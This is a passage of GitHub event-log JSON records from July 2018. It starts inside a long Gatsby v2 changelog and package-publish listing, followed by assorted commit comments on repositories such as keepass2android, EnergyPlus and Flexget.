- gatsby-plugin-netlify@1.0.19-11\n>  - gatsby-plugin-nprogress@2.0.0-alpha.12\n>  - gatsby-plugin-offline@2.0.0-alpha.15\n>  - gatsby-plugin-preact@2.0.1-11\n>  - gatsby-plugin-react-css-modules@2.0.0-alpha.12\n>  - gatsby-plugin-react-helmet@2.0.12-7\n>  - gatsby-plugin-react-next@2.0.1-11\n>  - gatsby-plugin-remove-trailing-slashes@1.0.6-9\n>  - gatsby-plugin-sass@2.0.0-alpha.15\n>  - gatsby-plugin-sharp@2.0.0-alpha.19\n>  - gatsby-plugin-sitemap@1.2.14-10\n>  - gatsby-plugin-styled-components@3.0.0-alpha.7\n>  - gatsby-plugin-styled-jsx@3.0.0-alpha.10\n>  - gatsby-plugin-styletron@1.0.13-11\n>  - gatsby-plugin-stylus@1.1.16-12\n>  - gatsby-plugin-twitter@1.0.18-11\n>  - gatsby-plugin-typescript@1.4.17-11\n>  - gatsby-plugin-typography@2.0.1-11\n>  - gatsby-react-router-scroll@1.0.12-10\n>  - gatsby-remark-autolink-headers@1.4.13-11\n>  - gatsby-remark-code-repls@1.0.18-10\n>  - gatsby-remark-copy-linked-files@1.5.28-10\n>  - gatsby-remark-custom-blocks@1.0.4-11\n>  - gatsby-remark-embed-snippet@1.0.10-12\n>  - gatsby-remark-images@2.0.0-alpha.21\n>  - gatsby-remark-katex@1.0.13-10\n>  - gatsby-remark-prismjs@1.2.16-11\n>  - gatsby-remark-responsive-iframe@1.4.18-10\n>  - gatsby-remark-smartypants@1.4.12-11\n>  - gatsby-source-contentful@2.0.0-alpha.18\n>  - gatsby-source-drupal@2.1.0-alpha.15\n>  - gatsby-source-faker@1.0.3-10\n>  - gatsby-source-filesystem@2.0.0-alpha.15\n>  - gatsby-source-hacker-news@1.0.11-10\n>  - gatsby-source-lever@1.0.9-11\n>  - gatsby-source-medium@1.0.13-10\n>  - gatsby-source-mongodb@1.5.16-10\n>  - gatsby-source-npm-package-search@1.0.9-6\n>  - gatsby-source-wikipedia@1.0.0-alpha.7\n>  - gatsby-source-wordpress@2.0.57-15\n>  - gatsby-transformer-csv@1.3.9-10\n>  - gatsby-transformer-documentationjs@1.4.10-10\n>  - gatsby-transformer-excel@2.0.1-10\n>  - gatsby-transformer-hjson@2.0.1-10\n>  - gatsby-transformer-javascript-frontmatter@1.0.6-9\n>  - gatsby-transformer-javascript-static-exports@2.0.1-10\n>  - gatsby-transformer-json@2.0.1-11\n>  - gatsby-transformer-pdfimages@1.0.6-8\n>  - gatsby-transformer-react-docgen@2.0.1-11\n>  - gatsby-transformer-remark@2.0.1-13\n>  - gatsby-transformer-screenshot@1.0.3-11\n>  - gatsby-transformer-sharp@2.0.1-12\n>  - gatsby-transformer-sqip@0.0.4-2\n>  - gatsby-transformer-toml@2.0.1-10\n>  - gatsby-transformer-xml@1.0.16-7\n>  - gatsby-transformer-yaml@2.0.1-11\n>  - gatsby@2.0.0-alpha.46\n>  - graphql-skip-limit@2.0.0-alpha.7\n>\n> * Publish\n>\n>  - gatsby@2.0.0-alpha.48\n>\n> * Fix a typo in Readme example (#5645)\n>\n> * [v2][doc] v1 to v2 migration guide (WIP) (#5575)\n>\n> * v1 to v2 migration guide doc start\n>\n> * Add sidebar link to v2 migration guide\n>\n> * Update README to show v1 to v2 migration guide\n>\n> * Fix children type in README (#5687)\n>\n> * Update redirects example for Gatsby v2 (#5681)\n>\n> * [v2][gatsby-image] Deepen propTypes declaration (#5684)\n>\n> * Add extensive prop types checking\n>\n> * This works better and is easier to read\n>\n> * Fix webp spelling\n>\n> * [v2][source-contentful] Restore legacy sizes and resolutions fragments\n> (#5678)\n>\n> * [v2] Restore legacy sizes and resolutions fragments\n>\n> * Reword TODO a little bit\n>\n> * [v2] Update csv example (#5703)\n>\n> * [v2] Update medium example (#5704)\n>\n> * [v2] Update no-plugins example (#5705)\n>\n> * Update no-plugins example\n>\n> * update html.js to use all passed props\n>\n> * format\n>\n> * [v2] Update client only paths example (#5706)\n>\n> * [v2] Update using-excel example (#5707)\n>\n> * [WIP][v2] Edit tutorial to use emotion instead of glamorous (#5664)\n>\n> * [v2] Edit tutorial part 4 to use emotion instead of glamorous\n>\n> * Change heading to siteTitle as it makes more sense\n>\n> * Change glamor to emotion + ran markdown formatter\n>\n> * Move css inline\n>\n> * part-six: change to emotion + run through format-markdown\n>\n> * part-seven: add Layout to template + run format-markdown\n>\n> * part-seven: add line highlight numbers to template changes\n>\n> * part-seven: emotion + format-markdown + add line highlight numbers\n>\n> * part-six: change sort syntax so it’s consistent with part-seven\n>\n> * Remove mistakenly added line\n>\n> * [v2][gatsby-transformer-sharp] restore legacy fragments (#5710)\n>\n> * Publish\n>\n>  - gatsby-image@2.0.0-alpha.4\n>  - gatsby-source-contentful@2.0.0-alpha.19\n>  - gatsby-transformer-sharp@2.0.1-13\n>  - gatsby@2.0.0-alpha.49\n>\n> * [v2] Update Emotion example (#5715)\n>\n> * Bump package versions\n>\n> * Add react-helmet and its Gatsby plugin\n>\n> * Migrate from custom html.js to react-helmet\n>\n> * Edit styling method to showcase different Emotion APIs\n>\n> * Add references to README\n>\n> * Change gatsby-plugin-react-helmet version to next\n>\n> * [v2] Update styled-components example (#5717)\n>\n> * Bump package versions\n>\n> * Add gatsby-plugin-react-helmet and gatsby-plugin-typography\n>\n> * Add react react-dom babel-plugin-styled-components\n>\n> * Remove outdated line (Gatsby hot reloads regardless of this line)\n>\n> * Migrate from custom html.js to react-helmet\n>\n> * Bump gatsby-plugin-typography version to next\n>\n> * Flag the new example as version 2.0.0, up from 1.0.0\n>\n> * Add references to README\n>\n> * [v2] Migration guide updates (#5661)\n>\n> * Remove yarn examples for consistency with other docs\n>\n> * Add rename responsive image queries section\n>\n> * Add postcss plugins section\n>\n> * Remove checklist (moved to issue 3986)\n>\n> * Add mixed CommonJS/ES6 section\n>\n> * Link to Gatsby webpack docs\n>\n> * Add node id section\n>\n> * Add section: remove explicit polyfills\n>\n> * Add section: Change modifyBabelrc to onCreateBabelConfig\n>\n> * Add section: Change `modifyWebpackConfig` to `onCreateWebpackConfig`\n>\n> * Add section:  CSS is inlined automatically\n>\n> * Add introduction and small tweaks\n>\n> * Correct line numbers\n>\n> * Improve explanation around movement of libs to peerDependencies\n>\n> * chore: minor capitalization tweak\n>\n> * Add edit link\n>\n> * Split peer dep updates into two sections\n>\n> * Declarative headings\n>\n> * Add table of contents\n>\n> * Use neater Fragment syntax\n>\n> * More detail on deprecation note\n>\n> * Inline comments on code examples\n>\n> * Add Jason's node ID query example\n>\n> * Use markdown diff syntax for before / after examples\n>\n> * Add 'in-progress' note about babel polyfills\n>\n> * Add instructions on how to install Gatsby v2\n>\n> * [gatsby] added TypeScript typings for StaticQuery component (#5666)\n>\n> This should make StaticQuery calls not give out any type errors in\n> TypeScript. Types are intentionally made weak, as I couldn't figure out\n> how to correctly type any GraphQL calls here.\n>\n> * [v2][gatsby-image][source-contentful] Fix sizes fields that were\n> changed to fluid by mistake (#5714)\n>\n> * Fix sizes field that was changed to fluid by mistake\n>\n> * [gatsby-image] Fix sizes fields that were changed to fluid by mistake\n>\n> * Update test snapshot\n>\n> * [v2] compile cache dir (#5637)\n>\n> * run cache-dir through babel\n>\n> * fix gitignore\n>\n> * watch cache-dir\n>\n> * fix cache-dir linting and update json-store react lifecycle methods\n>\n> * build rawfiles during watch\n>\n> * Publish\n>\n>  - gatsby-image@2.0.0-alpha.5\n>  - gatsby-source-contentful@2.0.0-alpha.20\n>  - gatsby@2.0.0-alpha.50\n>\n> * [v2] Correct inlined css upgrade guide (#5741)\n>\n> v1's default html.js also inlined css https://github.com/gatsbyjs/\n> gatsby/blob/master/packages/gatsby/cache-dir/default-html.js\n>\n> The change is that with mini-css-extract-plugin, we have css splitting so\n> we handle inlining css in core as it requires understanding webpack's stats\n> object.\n>\n> * [v2] fix build with pathPrefix (#5691)\n>\n> * [v2] fix build with pathPrefix\n>\n> * update test\n>\n> * removed __PREFIX_PATHS__\n>\n> * fix test\n>\n> * update lock file\n>\n> * address comments\n>\n> * clean\n>\n> * clean\n>\n> * [v2] Update styleguide example (#5712)\n>\n> * Update styleguide example for v2\n>\n> * Replace boundActionCreators to actions\n>\n> * Use pageContext\n>\n> * Fix exports\n>\n> * [v2] Update redux example (#5713)\n>\n> * Update redux example for v2\n>\n> * Remove html.js\n>\n> * Use ES6 export\n>\n> * [v2] Update Emotion + PrismJS example (#5720)\n>\n> * Add required packages + upgrade their versions\n>\n> * Refactor layout component to v2\n>\n> * Migrate from custom html.js to react-helmet\n>\n> * Add references to README\n>\n> * Fix typo + remove semi\n>\n> * Fix typo\n>\n> * Fix lint errors + remove unused console.log\n>\n> * Fix mixed up blog post content\n>\n> * Show proper page titles\n>\n> * remove word\n>\n> * remove word\n>\n> * Update page loading indicator example for Gatsby v2 (#5735)\n>\n> * Update using css modules example for Gatsby v2 (#5736)\n>\n> * [v2] Update plugin-typescript to use Babel (#5709)\n>\n> * Update plugin-typescript to use Babel\n>\n> * Fix code style\n>\n> * Bump the version\n>\n> * Update README\n>\n> * Use npm for install instructions\n>\n> * Add more cheese (#5751)\n>\n> * Update using-styletron example for v2 (#5749)\n>\n> * fix: page renderer behavior (#5759)\n>\n> * [v2] Migration guide: shorten TOC links to just the hash (#5766)\n>\n> * Simplify TOC links to just the hash\n>\n> * Run it through format-markdown script\n>\n> * Publish\n>\n>  - gatsby-link@1.6.38-13\n>  - gatsby-plugin-typescript@2.0.0-alpha.2\n>  - gatsby@2.0.0-alpha.51\n>\n> * [v2] Don't allow unknown keys on node.internal object (#5770)\n>\n> * [v2] Don't allow unknown fields on node.internal object\n>\n> Validate against changes like https://github.com/gatsbyjs/gatsby/pull/5557\n>\n> * Document the change\n>\n> * Add script for adding new owners to our NPM packages (#5768)\n>\n> * [v2] Update typescript example (#5711)\n>\n> * Improve the TypeScript example\n>\n> * Set up linting and type checking\n>\n> Tweak tsconfig.json\n>\n> * Remove extraneous package\n>\n> * Update using-path-prefix example for v2 (#5752)\n>\n> * [v2] Update using-remark-copy-linked-file example (#5755)\n>\n> * Update using-remark-copy-linked-files example for v2\n>\n> * Remove react-responsive-grid\n>\n> refs gatsbyjs/gatsby-starter-blog#99\n>\n> * Use Layout component\n>\n> * [v2] Update Sitemap example (#5767)\n>\n> * [v2] Update using-glamor example (#5757)\n>\n> * Update packages\n>\n> * Remove unused typography packages\n>\n> * Add typography.js\n>\n> * eslint\n>\n> * [docgen] better error handling and update to v3 (#5604)\n>\n> * better error handling and update to v3\n>\n> * fix rdg version:\n>\n> * update doc-handler\n>\n> * Update package.json\n>\n> * make test more robust\n>\n> * fix test\n>\n> * Update no-trailing-slashes example for v2 (#5781)\n>\n> * Update simple-auth example for v2 (#5782)\n>\n> * Link directly to edit page (#5792)\n>\n> Closes #5791\n>\n> * Update wording (#5795)\n>\n> * [v2] export graphql package from gatsby (#5415)\n>\n> * export graphql package from gatsby\n>\n> * update after sqip plugin merge\n>\n> * revert weird formatting changes\n>\n> * fix graphql.js packaging\n>\n> * note in Breaking Changes for plugin maintainers\n>\n> * fix typo\n>\n> * remove graphql-type-json from plugins deps\n>\n> * update setFieldsOnGraphQLNodeType docs\n>\n> * update yarn.lock\n>\n> * Typo\n>\n> * Minor edits\n>\n> * update migration guide\n>\n> * Add a word\n>\n> * [v2] Use kebabHash() instead of _.kebabCase() (#5532)\n>\n> * Add dep `kebab-hash` to `packages/gatsby`. #4637\n>\n> * Replace `_.kebabCase()` with `kebabHash()`. #4637\n>\n> * Add dep `kebab-hash` to `packages/gatsby`. #4637\n>\n> * Replace `_.kebabCase()` with `kebabHash()`. #4637\n>\n> In the `gatsby-plugin-netlify` package.\n>\n> * Bump `kebab-hash` to `0.1.2`. #4637\n>\n> * Update snapshots for new path ID format. #4637\n>\n> * [v2] Clarify filenames and update `sizes` to `fluid` (#5809)\n>\n> [v2] Clarify filenames and update `sizes` to `fluid`\n>\n> * fix: upstream fixes (#5815)\n>\n> * webpack hmr path responding appropriately to env\n> GATSBY_WEBPACK_PUBLICPATH\n>\n> * make linter happy\n>\n> * added public path env option for webpack (#5527)\n>\n> * Publish\n>\n>  - babel-plugin-remove-graphql-queries@2.0.1-10\n>  - gatsby-plugin-netlify@1.0.19-12\n>  - gatsby-plugin-typescript@2.0.0-alpha.3\n>  - gatsby-source-contentful@2.0.0-alpha.21\n>  - gatsby-source-filesystem@2.0.0-alpha.16\n>  - gatsby-transformer-react-docgen@2.0.1-12\n>  - gatsby-transformer-remark@2.0.1-14\n>  - gatsby-transformer-sharp@2.0.1-14\n>  - gatsby-transformer-sqip@0.0.4-3\n>  - gatsby@2.0.0-alpha.52\n>\n> * Publish\n>\n>  - babel-plugin-remove-graphql-queries@2.0.1-11\n>  - gatsby-1-config-css-modules@1.0.10-12\n>  - gatsby-1-config-extract-plugin@1.0.4-7\n>  - gatsby-cli@1.1.41-12\n>  - gatsby-dev-cli@1.2.12-9\n>  - gatsby-image@2.0.0-alpha.6\n>  - gatsby-link@1.6.38-14\n>  - gatsby-plugin-canonical-urls@1.0.14-11\n>  - gatsby-plugin-catch-links@2.0.1-12\n>  - gatsby-plugin-coffeescript@2.0.0-alpha.14\n>  - gatsby-plugin-create-client-paths@1.0.6-10\n>  - gatsby-plugin-emotion@2.0.0-alpha.11\n>  - gatsby-plugin-facebook-analytics@1.0.4-8\n>  - gatsby-plugin-feed@1.3.19-12\n>  - gatsby-plugin-fullstory@1.0.4-8\n>  - gatsby-plugin-glamor@2.0.0-alpha.14\n>  - gatsby-plugin-google-analytics@1.0.20-11\n>  - gatsby-plugin-google-tagmanager@1.0.15-12\n>  - gatsby-plugin-guess-js@1.0.0-alpha.9\n>  - gatsby-plugin-jss@2.0.1-11\n>  - gatsby-plugin-less@2.0.0-alpha.16\n>  - gatsby-plugin-lodash@3.0.0-alpha.13\n>  - gatsby-plugin-manifest@2.0.1-18\n>  - gatsby-plugin-netlify-cms@1.0.8-12\n>  - gatsby-plugin-netlify@1.0.19-13\n>  - gatsby-plugin-no-sourcemaps@1.0.4-6\n>  - gatsby-plugin-nprogress@2.0.0-alpha.13\n>  - gatsby-plugin-offline@2.0.0-alpha.16\n>  - gatsby-plugin-preact@2.0.1-12\n>  - gatsby-plugin-react-css-modules@2.0.0-alpha.13\n>  - gatsby-plugin-react-helmet@2.0.12-8\n>  - gatsby-plugin-react-next@2.0.1-12\n>  - gatsby-plugin-remove-trailing-slashes@1.0.6-10\n>  - gatsby-plugin-sass@2.0.0-alpha.16\n>  - gatsby-plugin-sharp@2.0.0-alpha.20\n>  - gatsby-plugin-sitemap@1.2.14-11\n>  - gatsby-plugin-styled-components@3.0.0-alpha.8\n>  - gatsby-plugin-styled-jsx@3.0.0-alpha.11\n>  - gatsby-plugin-styletron@1.0.13-12\n>  - gatsby-plugin-stylus@1.1.16-13\n>  - gatsby-plugin-twitter@1.0.18-12\n>  - gatsby-plugin-typescript@2.0.0-alpha.4\n>  - gatsby-plugin-typography@2.0.1-12\n>  - gatsby-react-router-scroll@1.0.12-11\n>  - gatsby-remark-autolink-headers@1.4.13-12\n>  - gatsby-remark-code-repls@1.0.18-11\n>  - gatsby-remark-copy-linked-files@1.5.28-11\n>  - gatsby-remark-custom-blocks@1.0.4-12\n>  - gatsby-remark-embed-snippet@2.0.1-2\n>  - gatsby-remark-images@2.0.0-alpha.22\n>  - gatsby-remark-katex@1.0.13-11\n>  - gatsby-remark-prismjs@2.0.3-2\n>  - gatsby-remark-responsive-iframe@1.4.18-11\n>  - gatsby-remark-smartypants@1.4.12-12\n>  - gatsby-source-contentful@2.0.0-alpha.22\n>  - gatsby-source-drupal@2.1.0-alpha.16\n>  - gatsby-source-faker@1.0.3-11\n>  - gatsby-source-filesystem@2.0.0-alpha.17\n>  - gatsby-source-hacker-news@1.0.11-11\n>  - gatsby-source-lever@1.0.9-12\n>  - gatsby-source-medium@1.0.13-11\n>  - gatsby-source-mongodb@1.5.16-11\n>  - gatsby-source-npm-package-search@1.0.9-7\n>  - gatsby-source-wikipedia@1.0.0-alpha.8\n>  - gatsby-source-wordpress@2.0.57-16\n>  - gatsby-transformer-csv@1.3.9-11\n>  - gatsby-transformer-documentationjs@1.4.10-11\n>  - gatsby-transformer-excel@2.0.1-11\n>  - gatsby-transformer-hjson@2.0.1-11\n>  - gatsby-transformer-javascript-frontmatter@1.0.6-10\n>  - gatsby-transformer-javascript-static-exports@2.0.1-11\n>  - gatsby-transformer-json@2.0.1-12\n>  - gatsby-transformer-pdfimages@1.0.6-9\n>  - gatsby-transformer-react-docgen@2.0.1-13\n>  - gatsby-transformer-remark@2.0.1-15\n>  - gatsby-transformer-screenshot@1.0.3-12\n>  - gatsby-transformer-sharp@2.0.1-15\n>  - gatsby-transformer-sqip@0.0.4-4\n>  - gatsby-transformer-toml@2.0.1-11\n>  - gatsby-transformer-xml@1.0.16-8\n>  - gatsby-transformer-yaml@2.0.1-12\n>  - gatsby@2.0.0-alpha.53\n>  - graphql-skip-limit@2.0.0-alpha.8\n>\n> * Publish\n>\n>  - babel-plugin-remove-graphql-queries@2.0.1-12\n>  - gatsby-1-config-css-modules@1.0.10-13\n>  - gatsby-1-config-extract-plugin@1.0.4-8\n>  - gatsby-cli@1.1.41-13\n>  - gatsby-dev-cli@1.2.12-10\n>  - gatsby-image@2.0.0-alpha.7\n>  - gatsby-link@1.6.38-15\n>  - gatsby-plugin-canonical-urls@1.0.14-12\n>  - gatsby-plugin-catch-links@2.0.1-13\n>  - gatsby-plugin-coffeescript@2.0.0-alpha.15\n>  - gatsby-plugin-create-client-paths@1.0.6-11\n>  - gatsby-plugin-emotion@2.0.0-alpha.12\n>  - gatsby-plugin-facebook-analytics@1.0.4-9\n>  - gatsby-plugin-feed@1.3.19-13\n>  - gatsby-plugin-fullstory@1.0.4-9\n>  - gatsby-plugin-glamor@2.0.0-alpha.15\n>  - gatsby-plugin-google-analytics@1.0.20-12\n>  - gatsby-plugin-google-tagmanager@1.0.15-13\n>  - gatsby-plugin-guess-js@1.0.0-alpha.10\n>  - gatsby-plugin-jss@2.0.1-12\n>  - gatsby-plugin-less@2.0.0-alpha.17\n>  - gatsby-plugin-lodash@3.0.0-alpha.14\n>  - gatsby-plugin-manifest@2.0.1-19\n>  - gatsby-plugin-netlify-cms@1.0.8-13\n>  - gatsby-plugin-netlify@1.0.19-14\n>  - gatsby-plugin-nprogress@2.0.0-alpha.14\n>  - gatsby-plugin-offline@2.0.0-alpha.17\n>  - gatsby-plugin-preact@2.0.1-13\n>  - gatsby-plugin-react-css-modules@2.0.0-alpha.14\n>  - gatsby-plugin-react-helmet@2.0.12-9\n>  - gatsby-plugin-react-next@2.0.1-13\n>  - gatsby-plugin-remove-trailing-slashes@1.0.6-11\n>  - gatsby-plugin-sass@2.0.0-alpha.17\n>  - gatsby-plugin-sharp@2.0.0-alpha.21\n>  - gatsby-plugin-sitemap@1.2.14-12\n>  - gatsby-plugin-styled-components@3.0.0-alpha.9\n>  - gatsby-plugin-styled-jsx@3.0.0-alpha.12\n>  - gatsby-plugin-styletron@1.0.13-13\n>  - gatsby-plugin-stylus@1.1.16-14\n>  - gatsby-plugin-twitter@1.0.18-13\n>  - gatsby-plugin-typescript@2.0.0-alpha.5\n>  - gatsby-plugin-typography@2.0.1-13\n>  - gatsby-react-router-scroll@1.0.12-12\n>  - gatsby-remark-autolink-headers@1.4.13-13\n>  - gatsby-remark-code-repls@1.0.18-12\n>  - gatsby-remark-copy-linked-files@1.5.28-12\n>  - gatsby-remark-custom-blocks@1.0.4-13\n>  - gatsby-remark-embed-snippet@2.0.1-3\n>  - gatsby-remark-images@2.0.0-alpha.23\n>  - gatsby-remark-katex@1.0.13-12\n>  - gatsby-remark-prismjs@2.0.3-3\n>  - gatsby-remark-responsive-iframe@1.4.18-12\n>  - gatsby-remark-smartypants@1.4.12-13\n>  - gatsby-source-cont"}},"created_at":"2018-07-12T16:55:57Z"}
{"id":"7957499671","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29688022,"position":null,"line":null,"path":null,"commit_id":"746688d3e52ff7eddc9f993c7463bc7a769a0ed9","created_at":"2018-07-12T16:56:42Z","updated_at":"2018-07-12T16:56:42Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-165641 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-165641\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:56:42Z"}
{"id":"7957509533","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29688055,"position":32,"line":472,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T16:58:39Z","updated_at":"2018-07-12T16:58:39Z","author_association":"CONTRIBUTOR","body":"\"Could not open from **source**: %1$s. Loaded file from **internal** cache. [...]\""}},"created_at":"2018-07-12T16:58:39Z"}
{"id":"7957517264","type":"CommitCommentEvent","actor":{"login":"binamov"},"repo":{"name":"Flexget/Flexget"},"payload":{"comment":{"id":29688067,"position":null,"line":null,"path":null,"commit_id":"043de1e6b0d0ec4b422f44b2157266171bda7cbe","created_at":"2018-07-12T17:00:12Z","updated_at":"2018-07-12T17:00:12Z","author_association":"NONE","body":"seems like there was a cookie stuck from before this change or something. i cleaned up the database as suggested by @liiight and it's all good now"}},"created_at":"2018-07-12T17:00:12Z"}
{"id":"7957518216","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29688073,"position":39,"line":476,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T17:00:21Z","updated_at":"2018-07-12T17:00:21Z","author_association":"CONTRIBUTOR","body":"\"Updated **internal** cache copy of %1$s.\""}},"created_at":"2018-07-12T17:00:21Z"}
{"id":"7957520020","type":"CommitCommentEvent","actor":{"login":"NikkelClark"},"repo":{"name":"zforster/python-motion-detection"},"payload":{"comment":{"id":29688076,"position":null,"line":null,"path":null,"commit_id":"74242cce9d5c2cbf5d98c8326dfe0130eae985f9","created_at":"2018-07-12T17:00:39Z","updated_at":"2018-07-12T17:00:39Z","author_association":"NONE","body":"What are you building Mr Foster?"}},"created_at":"2018-07-12T17:00:39Z"}
{"id":"7957524062","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29688078,"position":null,"line":null,"path":null,"commit_id":"4d24ede752c17a2c6ecaada81ed007e5cb930e72","created_at":"2018-07-12T17:01:27Z","updated_at":"2018-07-12T17:01:27Z","author_association":"COLLABORATOR","body":"Japp... try out latest commit. "}},"created_at":"2018-07-12T17:01:27Z"}
{"id":"7957527816","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29688084,"position":6,"line":19,"path":"contrib/zpages/build.gradle","commit_id":"48f9df44957794e14680e7587d4865279b521251","created_at":"2018-07-12T17:02:13Z","updated_at":"2018-07-12T17:02:13Z","author_association":"OWNER","body":"Unfortunately this alternative did not generate the CSS in the resources/ directory, although the first option did. This leads me to believe the issue may reside elsewhere. I will continue troubleshoot."}},"created_at":"2018-07-12T17:02:13Z"}
{"id":"7957530251","type":"CommitCommentEvent","actor":{"login":"mkarpoff"},"repo":{"name":"mkarpoff/vim8-pack"},"payload":{"comment":{"id":29688090,"position":null,"line":null,"path":null,"commit_id":"c2074ab9e76dd2519a64e12e809715a0f97db6fa","created_at":"2018-07-12T17:02:40Z","updated_at":"2018-07-12T17:02:40Z","author_association":"OWNER","body":"Fixes #1 "}},"created_at":"2018-07-12T17:02:40Z"}
{"id":"7957532506","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29688096,"position":null,"line":null,"path":null,"commit_id":"439e126c228b1c69a8dd024217981039bd39c571","created_at":"2018-07-12T17:03:06Z","updated_at":"2018-07-12T17:03:06Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-12T17:03:06Z"}
{"id":"7957540617","type":"CommitCommentEvent","actor":{"login":"djowdobom"},"repo":{"name":"ESX-Org/esx_ambulancejob"},"payload":{"comment":{"id":29688113,"position":null,"line":null,"path":null,"commit_id":"567378710e552545064809286e187decb490afd9","created_at":"2018-07-12T17:04:48Z","updated_at":"2018-07-12T17:04:48Z","author_association":"NONE","body":"great!"}},"created_at":"2018-07-12T17:04:48Z"}
{"id":"7957542146","type":"CommitCommentEvent","actor":{"login":"kylerw"},"repo":{"name":"arsaboo/homeassistant-config"},"payload":{"comment":{"id":29688117,"position":null,"line":null,"path":null,"commit_id":"ce6f40fa307a09cfade89c41dbeb82dff6a23ed1","created_at":"2018-07-12T17:05:09Z","updated_at":"2018-07-12T17:05:09Z","author_association":"NONE","body":"This seems to remove the fan speed selector."}},"created_at":"2018-07-12T17:05:09Z"}
{"id":"7957544947","type":"CommitCommentEvent","actor":{"login":"bossloper"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29688120,"position":null,"line":null,"path":null,"commit_id":"257734d0906ce11d8f372dd4f22182fb14b3212b","created_at":"2018-07-12T17:05:42Z","updated_at":"2018-07-12T17:05:42Z","author_association":"NONE","body":"@dmi3yy - are these changes getting added to 1.4.x or not? The manager/includes/src/ folder and all files? Among other things they completely change where dashboard files are stored. If not then there are a couple of commits I added to dev based on this that I will need to resubmit for 1.4.x."}},"created_at":"2018-07-12T17:05:42Z"}
{"id":"7957547468","type":"CommitCommentEvent","actor":{"login":"cksriprajittichai"},"repo":{"name":"cksriprajittichai/StockWatch"},"payload":{"comment":{"id":29688129,"position":null,"line":null,"path":null,"commit_id":"408832a2d9338c10eadda64cea74e1a0104cbc0e","created_at":"2018-07-12T17:06:13Z","updated_at":"2018-07-12T17:06:13Z","author_association":"OWNER","body":"In MultiStockRequest, the incorrect state string (\"open\") was undetected because prior to the creation of a constant AdvancedStock for errors, the default case on this switch statement in MultiStockRequest was to set the state to OPEN."}},"created_at":"2018-07-12T17:06:13Z"}
{"id":"7957550805","type":"CommitCommentEvent","actor":{"login":"yirkajk"},"repo":{"name":"math1um/objects-invariants-properties"},"payload":{"comment":{"id":29688137,"position":null,"line":null,"path":null,"commit_id":"5187f0e640a8933be6f546aac82f85008365619c","created_at":"2018-07-12T17:06:54Z","updated_at":"2018-07-12T17:06:54Z","author_association":"COLLABORATOR","body":"Closes #582 "}},"created_at":"2018-07-12T17:06:54Z"}
{"id":"7957553505","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29688145,"position":null,"line":null,"path":null,"commit_id":"7c85d4a6f9252eaed827a95f5dc72e69140ba112","created_at":"2018-07-12T17:07:28Z","updated_at":"2018-07-12T17:07:28Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2973 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T17:07:28Z"}
{"id":"7957559122","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29688156,"position":null,"line":null,"path":null,"commit_id":"243a5a105aba78f4fd900f034840c8bb0e51acaf","created_at":"2018-07-12T17:08:38Z","updated_at":"2018-07-12T17:08:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add New Member Page Functionality](https://trello.com/c/jdjKTrDb/60-add-new-member-page-functionality)"}},"created_at":"2018-07-12T17:08:38Z"}
